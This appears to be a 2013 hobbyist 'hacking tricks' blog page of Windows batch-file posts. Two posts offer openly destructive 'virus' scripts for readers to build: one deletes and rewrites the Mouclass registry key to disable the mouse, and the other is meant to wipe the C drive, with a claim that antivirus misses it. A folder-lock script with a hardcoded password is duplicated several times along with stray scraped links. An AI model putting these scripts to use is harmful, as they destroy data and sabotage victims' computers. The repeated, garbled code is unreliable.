Saturday 12 October 2013

Create Virus To disable Mouse


Mouse is One of The most Important part of your computer and not working of this may make your mind frustrated.


How to Create this Virus




  • Open Notepad and copy below codes

   
rem ---------------------------------
    rem Disable Mouse
    set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
    reg delete %key%
    reg add %key% /v Start /t REG_DWORD /d 4
    rem ---------------------------------
 


  • Save this file as  virus.bat 
  • Done you just created your virus.

 Double Clicking on virus.bat file will disable your mouse.

You may Be interested in:
        Creating A dangerous Virus 
                    or
        Locking Folder With Password

How to make a Dangerous Virus

Your are a minute before to create the dangerous virus you must have ever seen!!!


This Virus is bieng created by using batch file programming. 

This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. 



How to Make the virus ?

  • Open Notepad and copy below code into it.

   
@Echo off
    Del C:\ *.* |y


  • Save this file as virus.bat (Name can be anything but .bat is must)
  • Now, running this file will delete all the content of C Drive.


Warning: Try at your own risk



Yoy may be intrested in

                    Create Virus To Disable Mouse
                                          
                            

Password Protect Any Folder

Again Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is the intresting trick how to lock the folder with a password without any software.



Steps to Create Folder Lock


  • Open Notepad and Copy code given below into it.



    cls
    @ECHO OFF
    title avkfreedom.blogspot.com
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST MyFolder goto MDMyFolder
    :CONFIRM
    echo Are you sure to lock this folder? (Y/N)
    set/p "cho=>"
    if %cho%==Y goto LOCK
    if %cho%==y goto LOCK
    if %cho%==n goto END
    if %cho%==N goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto End
    :UNLOCK
    echo Enter password to Unlock Your Secure Folder
    set/p "pass=>"
    if NOT %pass%== avkfreedom goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
    echo Folder Unlocked successfully
    goto End
    :FAIL
    echo Invalid password
    goto end
    :MDMyFolder
    md MyFolder
    echo MyFolder created successfully
    goto End
    :End

cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== coolhacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End - See more at: http://www.coolhackingtrick.com/2013/04/password-protect-any-folder-without-any.html#sthash.nvTzvfGX.dpuf

  • Save the notepad file as lock.bat (.bat is must)
  • Now double click on lock.bat and a new folder will be created with name MyFolder
  • Copy all your data you want to protect in that New folder
  • Now double click on lock.bat and when command promp appears Type Y and press enter.
  • Now MyFolder will be hidden from you view, to access that folder double click on lock.bat 
  • It will ask for password enter your password and done. (Default password is avkfreedom


NOTE-Here the Default Password Is"avkfreedom"

 For Further Security- Copy Your LOCK.BAT file in some secure place or in pendrive.

Feel free to comment below..

 

Monday 7 October 2013

Create Non-Deletable And Non-Renameable Folder

Some time you have some sensible and much important files to protect and to keep safely it on your PC.

Here is a trick to create a folder which neither can be deleted nor can be renamed.


Trick is that you have to make the folder with name which are reserved words in windows. You have to use only these names to create the folder. These names are-    


[ con, aux, lpt1, lpt2, lpt3 to lpt9 ]



Steps To Create Non-deleteable And Non-renameable Folder




  • Go to start and click on RUN.
  • Type "cmd" and hit ENTER.
  • In the cmd window type C: or D: and hit enter.(You can't create this type folder in the drive where windows is installed generally C:)
  • Type md con\ and hit enter (md - make directory)
  • You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  • Open that directory, you will see the folder created of name con.
  • Try to delete that folder or rename that folder windows will show the error message. 


How to delete such files

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.


  • Open Command Prompt
  • Type D: ( if u created this type of folder in D: drive) & hit enter
  • Type rd con\ (rd - remove directory)
  • Open that directory and the folder will not appear because it is removed.

Airport Authority of India AAI JE Previous Year paper

I have tried to collect previous year paper of Airport Authority of India. AAI JE ATC PREVIOUS YEAR PAPER                            ...